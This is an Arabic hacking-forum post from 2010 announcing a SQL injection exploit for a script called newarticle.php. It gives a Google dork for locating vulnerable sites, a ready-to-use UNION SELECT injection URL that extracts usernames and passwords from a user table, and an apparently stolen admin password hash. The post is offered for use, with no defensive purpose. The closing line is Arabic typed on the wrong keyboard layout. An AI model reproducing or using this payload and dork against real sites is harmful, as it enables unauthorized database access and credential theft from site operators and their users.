الموضوع: ثغرة أعلن عنها لأول مرة هنا في منتدى vbspiders
عرض مشاركة واحدة
قديم 08-19-2010, 10:24 AM   رقم المشاركة : 1 (permalink)
معلومات العضو
soufhak
 
الصورة الرمزية soufhak
 

 
 
إحصائية العضو





soufhak غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
soufhak is on a distinguished road
افتراضي ثغرة أعلن عنها لأول مرة هنا في منتدى vbspiders

بسم الله الرحمان الرحيم

السلام عليكم و رحمة الله و بركاته و بعد




#
Exploit Title : Sql Injection Vulnerability
# Date : 18-08-2010
# Author : soufhacker
# Version : All Versions

###############################################
Dork google: inurl:newarticle.php?id=
###############################################
Exploit:
http://site.com/path/newarticle.php?id=-805+UNION SELECT 1,concat(username,0x3a,password),3,4,5,6,7,8,9,10, 11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 ,28,29+from+access_all_areas.user--

###############################################
username : Admin
password : $1$V-s+pArA$T9V7JXDNeJ2AqiV9kfgCl/
Done!
#############soufhacker################


eyvm Hugk ukih gH,g lvm ikh td lkj]n vbspiders

   

رد مع اقتباس